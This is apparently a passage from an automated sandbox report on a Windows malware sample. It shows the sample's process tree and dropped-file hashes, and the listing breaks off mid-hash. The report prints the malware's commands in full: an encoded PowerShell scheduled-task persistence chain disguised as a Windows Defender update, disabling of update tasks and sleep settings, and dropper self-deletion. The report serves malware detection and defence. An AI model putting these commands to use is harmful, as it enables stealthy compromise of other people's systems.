C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 07⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 08⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe7⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAGcAQQBjAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBFAEEARwBVAEEAWgBnAEIAbABBAEcANABBAFoAQQBCAGwAQQBIAEkAQQBYAEEAQgAxAEEASABBAEEAWgBBAEIAaABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGwAQQBIAEkAQQBZAGcAQQBnAEEARgBJAEEAZABRAEIAdQBBAEUARQBBAGMAdwBBAGcAQQBEAHcAQQBJAHcAQgA0AEEARwA4AEEASQB3AEEAKwBBAEEAPQA9ACIAJwApACAAPAAjAHUAZABmACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcwBvAHIAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB3AGQAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBVAHAAZABhAHQAZQAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZgB6ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABEAGUAZgBlAG4AZABlAHIAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAagBwAG8AIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGsAYgBkAG4AIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFUAcABkAGEAdABlACcAOwA="7⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Windows Defender.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵
-
C:\Users\Admin\AppData\Local\svchost.exe"C:\Users\Admin\AppData\Local\svchost.exe"5⤵
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Executes dropped EXE
- Looks for VMWare drivers on disk
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe"C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe"6⤵
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Executes dropped EXE
- Looks for VMWare drivers on disk
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\Windows.exe"C:\Users\Admin\AppData\Local\Temp\Windows.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\EU1.exe"C:\Program Files (x86)\Company\NewProduct\EU1.exe"3⤵
- Executes dropped EXE
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Company\NewProduct\EU1.exeFilesize
289KB
MD598ee616bbbdae32bd744f31d48e46c72
SHA1fb2fe19e8890c7c4be116db78254fe3e1beb08a0
SHA2565e0e8817946e234867eb10b92ce613a12d1597ca53e73020ec19e1c76b3566cb
SHA512fab7fc5c37551ca64daad4611b62d456ed245946298f1b813120ca0fe45ffb76c29ec8402327e58c565fdf42f2b1d0bd18864b4ab63f85742e2b99772981af9d
-
C:\Program Files (x86)\Company\NewProduct\EU1.exeFilesize
289KB
MD598ee616bbbdae32bd744f31d48e46c72
SHA1fb2fe19e8890c7c4be116db78254fe3e1beb08a0
SHA2565e0e8817946e234867eb10b92ce613a12d1597ca53e73020ec19e1c76b3566cb
SHA512fab7fc5c37551ca64daad4611b62d456ed245946298f1b813120ca0fe45ffb76c29ec8402327e58c565fdf42f2b1d0bd18864b4ab63f85742e2b99772981af9d
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exeFilesize
178KB
MD58d24da259cd54db3ede2745724dbedab
SHA196f51cc49e1a6989dea96f382f2a958f488662a9
SHA25642f46c886e929d455bc3adbd693150d16f94aa48b050cfa463e399521c50e883
SHA512ec005a5ae8585088733fb692d78bbf2ff0f4f395c4b734e9d3bed66d6a73c2ee24c02da20351397768f2420c703ad47ffee785a2a2af455a000ab0e6620ec536
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exeFilesize
178KB
MD58d24da259cd54db3ede2745724dbedab
SHA196f51cc49e1a6989dea96f382f2a958f488662a9
SHA25642f46c886e929d455bc3adbd693150d16f94aa48b050cfa463e399521c50e883
SHA512ec005a5ae8585088733fb692d78bbf2ff0f4f395c4b734e9d3bed66d6a73c2ee24c02da20351397768f2420c703ad47ffee785a2a2af455a000ab0e6620ec536
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exeFilesize
107KB
MD541e7c847d8834ad0cfaea592afa75efd
SHA1cd96962e2380d721c16c1a80d698e91b358d9381
SHA2562f8315b053c200047ea8a92e138b0ed39ef86f3ed41d17eee1cf281f3f0ad1fa
SHA5125eefeace1b4192edc12eefe0c4c7a99d75f8a2a7721cd320fad6eff2bd70a24d593c67ac4b40899f719f5becbf2880fb2e5453009f39a5e1e348adb1867885b0
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exeFilesize
107KB
MD541e7c847d8834ad0cfaea592afa75efd
SHA1cd96962e2380d721c16c1a80d698e91b358d9381
SHA2562f8315b053c200047ea8a92e138b0ed39ef86f3ed41d17eee1cf281f3f0ad1fa
SHA5125eefeace1b4192edc12eefe0c4c7a99d75f8a2a7721cd320fad6eff2bd70a24d593c67ac4b40899f719f5becbf2880fb2e5453009f39a5e1e348adb1867885b0
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exeFilesize
107KB
MD52647a5be31a41a39bf2497125018dbce
SHA1a1ac856b9d6556f5bb3370f0342914eb7cbb8840
SHA25684c7458316adf09943e459b4fb1aa79bd359ec1516e0ad947f44bdc6c0931665
SHA51268f70140af2ad71a40b6c884627047cdcbc92b4c6f851131e61dc9db3658bde99c1a09cad88c7c922aa5873ab6829cf4100dc12b75f237b2465e22770657ae26
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exeFilesize
107KB
MD52647a5be31a41a39bf2497125018dbce
SHA1a1ac856b9d6556f5bb3370f0342914eb7cbb8840
SHA25684c7458316adf09943e459b4fb1aa79bd359ec1516e0ad947f44bdc6c0931665
SHA51268f70140af2ad71a40b6c884627047cdcbc92b4c6f851131e61dc9db3658bde99c1a09cad88c7c922aa5873ab6829cf4100dc12b75f237b2465e22770657ae26
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeFilesize
496KB
MD58f5056a3da7c93b60a5c0a9a9c26242c
SHA1c67ee1d7e81f46a5c08b45dca6eb354af1ee7b8c
SHA2568a631481dec5c4bfde1b90e812868a5edd093f44ebbb0625f91e6548c500ef67
SHA512617a6d8c6f3d0497503f6a15bb53623638df98b6ffed7cdaf6d1af8a327f3043f8a04e491e98bbc123740cb2e7c63caf58d93c00ecfe4e60e9460942e98747f8
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeFilesize
496KB
MD58f5056a3da7c93b60a5c0a9a9c26242c
SHA1c67ee1d7e81f46a5c08b45dca6eb354af1ee7b8c
SHA2568a631481dec5c4bfde1b90e812868a5edd093f44ebbb0625f91e6548c500ef67
SHA512617a6d8c6f3d0497503f6a15bb53623638df98b6ffed7cdaf6d1af8a327f3043f8a04e491e98bbc123740cb2e7c63caf58d93c00ecfe4e60e9460942e98747f8
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeFilesize
245KB
MD5b16134159e66a72fb36d93bc703b4188
SHA1e869e91a2b0f77e7ac817e0b30a9a23d537b3001
SHA256b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c
SHA5123fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeFilesize
245KB
MD5b16134159e66a72fb36d93bc703b4188
SHA1e869e91a2b0f77e7ac817e0b30a9a23d537b3001
SHA256b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c
SHA5123fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c
-
C:\Program Files (x86)\Company\NewProduct\real.exeFilesize
289KB
MD584d016c5a9e810c2ef08767805a87589
SHA1750b15c9c1acdfcd1396ecec11ab109706a945ad
SHA2566e8bae93bead10d8778a8f442828aac20a0bd5c87cabe3f6d76282a9d47b7845
SHA5127c612dd0f3eab6cb602c12390f62daa0e75d83433bcd4b682d1d5b931ebc52c8f6b32acd12474bdf6eecb91541dfa11cbbd57ca6cf8297ae9c407923e4d95953
-
C:\Program Files (x86)\Company\NewProduct\real.exeFilesize
289KB
MD584d016c5a9e810c2ef08767805a87589
SHA1750b15c9c1acdfcd1396ecec11ab109706a945ad
SHA2566e8bae93bead10d8778a8f442828aac20a0bd5c87cabe3f6d76282a9d47b7845
SHA5127c612dd0f3eab6cb602c12390f62daa0e75d83433bcd4b682d1d5b931ebc52c8f6b32acd12474bdf6eecb91541dfa11cbbd57ca6cf8297ae9c407923e4d95953
-
C:\Program Files (x86)\Company\NewProduct\safert44.exeFilesize
244KB
MD5dbe947674ea388b565ae135a09cc6638
SHA1ae8e1c69bd1035a92b7e06baad5e387de3a70572
SHA25686aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709
SHA51267441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893
-
C:\Program Files (x86)\Company\NewProduct\safert44.exeFilesize
244KB
MD5dbe947674ea388b565ae135a09cc6638
SHA1ae8e1c69bd1035a92b7e06baad5e387de3a70572
SHA25686aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709
SHA51267441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893
-
C:\Program Files (x86)\Company\NewProduct\tag.exeFilesize
107KB
MD52ebc22860c7d9d308c018f0ffb5116ff
SHA178791a83f7161e58f9b7df45f9be618e9daea4cd
SHA2568e2c9fd68fc850fa610d1edfd46fc4a66adbef24e42a1841290b0e0c08597e89
SHA512d4842627f6fab09f9472ed0b09b5e012524bf6b821d90a753275f68de65b7ba084a9e15daca58a183f89b166cc9d2d2f2d6a81e1110e66c5822b548279c8c05e
-
C:\Program Files (x86)\Company\NewProduct\tag.exeFilesize
107KB
MD52ebc22860c7d9d308c018f0ffb5116ff
SHA178791a83f7161e58f9b7df45f9be618e9daea4cd
SHA2568e2c9fd68fc850fa610d1edfd46fc4a66adbef24e42a1841290b0e0c08597e89
SHA512d4842627f6fab09f9472ed0b09b5e012524bf6b821d90a753275f68de65b7ba084a9e15daca58a183f89b166cc9d2d2f2d6a81e1110e66c5822b548279c8c05e
-
C:\Program Files\Defender\updater.exeFilesize
4.9MB
MD514534cb24128c15a2d6c1dac1b11af55
SHA133dc4dac54e1adc5979a3fc732432e6d09a0c8c4
SHA2564eefc4f042a6570cfbdbaca40622dad3c81b5c63ee039835ec41414569494d62
SHA512609a0d51a970de923b6de0b128eb452dc9177a70fd78d269287506bbad877194a8c4a66b6a0717bc0486e11ddda6aa94a6152a83d19ae83889e5725a2e7920a7
-
C:\Program Files\Defender\updater.exeFilesize
4.9MB
MD514534cb24128c15a2d6c1dac1b11af55
SHA133dc4dac54e1adc5979a3fc732432e6d09a0c8c4
SHA2564eefc4f042a6570cfbdbaca40622dad3c81b5c63ee039835ec41414569494d62
SHA512609a0d51a970de923b6de0b128eb452dc9177a70fd78d269287506bbad877194a8c4a66b6a0717bc0486e11ddda6aa94a6152a83d19ae83889e5725a2e7920a7
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB7.tmp.csvFilesize
41KB
MD59edc87afcc1e728fa7da75e0adeca243
SHA19c51da77ae171fdc6bc6cecc5fdc87662172b496
SHA2568fa68970ffd4b18e111b768962171aa3f7f79ad096fb3c32ff1d528ce2975b27
SHA5124c0242d6254f1e88fd37cbe44ae7b82a45da5af7d07acb67c52f06d62c0bdab9c5ee02966b4c4309007f56bfeca3fce376d0a3acd79e753ed1eb967dad87b96a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AD7.tmp.txtFilesize
12KB
MD5a1eb9c26aa8471c1d0f86fbb0f4ff83e
SHA148b4d3bfd7e9acc6cc7edf8ef134786601b7abda
SHA2560e491e39e27b39b73e3c023bd30c6c15fff87db6bfa26845a6a9b80b91ec2065
SHA51259f84b6b017c509353df1714213e6f003358ca2eb41e9684b8163ec9bbaa591cd090260c62a7ce7041152b5aaa024e31c32438ce7d27089c09ddaf68984862d2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D1A.tmp.csvFilesize
39KB
MD57bee6f0305372bb0f371ebe1b1c1ea6e
SHA1c4611aadce56bd81004ab4afe15521a97f31d11d
SHA256a787bf4dfd5fec8aece73de146797537c262f3b9c285689b99e86948aab7d98d
SHA512e8d422cbcfee6e411e30bc9fb49e37cceae69cc8f8990074c6fd62c6868e3168fe003e118677bfc96dcf19b2222f3a20d6f3a045b05097702574a6b4079d9882
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D3A.tmp.txtFilesize
12KB
MD5adfb22bc2aeb9a998fe4ff9bf8350491
SHA139d081751ba1d9d0d1783b3a970b32d55c10ae07
SHA256d7450683ce8b722148e6a4d978f5e109c9df57d1456b90888266724165679fcc
SHA5124aa8aa5c67f56c23e23a17775cbd78fd9a246ba342cbd3c475617aa73afe94bb997c0800aa981bc296e9c403da18acbcffadb37c612d0a6f30aea0a5c48bb34d
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5900713b658f108100bb7aa144134dbca
SHA17a05dd4d5cd03542c5187c8a3036f30b9d79daf0
SHA256c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8
SHA51285a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a7885e1b92464320f2689e44d78ddbdf
SHA1064eb9c538e52b11e70522c2fd3089df8bb5f59b
SHA2562089f1529a617b107ba27dcaf0e3a79726ae0f0074907d772ed2e63126467ae1
SHA512d7778b574171093e16422e5f9d7321fbfbf392cca2c76ac22b4a6b8ff8f27e9c50d9525a7a2e7bb0611a1553e1c980fadd4d9735d43cf083298854d32ea88da2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55b20356b92d05d61f036769cdf2f7bbf
SHA195f9b464be449714747776934fa55bb5bf622795
SHA256223d2ebeb965a165d8267e955b2d970202f3a524f6f64c559eb5a9e75bb973a3
SHA512f046d4e812f238f8533dcb7c18e39defc5b6bd9bca644cb43362af9904aa8f4d22b00285d7985c8e955dacfaa24f24b654e66ef7e000b38729d49fedecb38411
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD598b0666d5f8e951f05374dbb3bdfda27
SHA1f92fb138fc6ca583ddad18e160803e0a5ab74f8b
SHA2566c64618ccb09c74a2d240301f38fb5d8f2f7fd8a651200f986595e09807308b1
SHA5120c6fd899c13dcd146b08e6f87f24103e6d2d608fc6bce35ca59d1738fec238999c1d3f5a1234bb7bd95a9d0340d0934ad0232269e677bbcd78267a27f1068eae
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\03C0QDVU.cookieFilesize
336B
MD5f3939a68392e952fb3944ece4dc1fa38
SHA1e75f3d18be36aaa3b1cf6f4a156ea2027a3b7017
SHA25660b0113ad3fd24d89ef04e2ef294f3abf6ab5847797ca0ae492ac3c4faaa5ad2
SHA5124f8f31a648ffce53ff7694380bfdd1f0696154c15702db26b9c84d7cf67d841df75ddeb9930072fb4260b935afe8e4dd2b44a953bcd78680267d7142316df214
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\6U04SFHO.cookieFilesize
253B
MD5f28a5484342b90f180832764cc4a7b67
SHA16dc2f1d235b199450e116b2949360d151c042ae5
SHA2566ade4a7376988a7797a46306a61956130b9e38711b63e02da74a9e1ab6aa3d43
SHA5124f34703c7690ad1b8938cec20589fe5de4acef80ce19af2b9f32518c6fb7d5a93a208239cd329ffd379f793a1a33a31216bb9e34851b59125b859a4849afb3c7
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\7EVD638G.cookieFilesize
419B
MD5453203084017209fa15639356e82bc8f
SHA18a1abac313b7c0ba1ee35e51a9516f0d9202bdb3
SHA256c267b6adb68a45789d0b64db5214577f841a4051c919d14adf9643ba00e1b4cc
SHA5129ecc1390c5bc38e3031034a2cefa7d9290370dabf549b1e1de50bdc79606d3b7ba6c622f91a11cd222d458677d3d01c192e45de371b92995dff45b4a6a68376d
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\9O4C8BF2.cookieFilesize
672B
MD50574fc6dd4fd791818db086a3f97e600
SHA1dc3c237e47e4021feb41a08b185b78ee91171d6b
SHA2561a5c07d4fc6546dcef2c0c6040a8624cb4cb273e2a20a8b294af779af70394fc
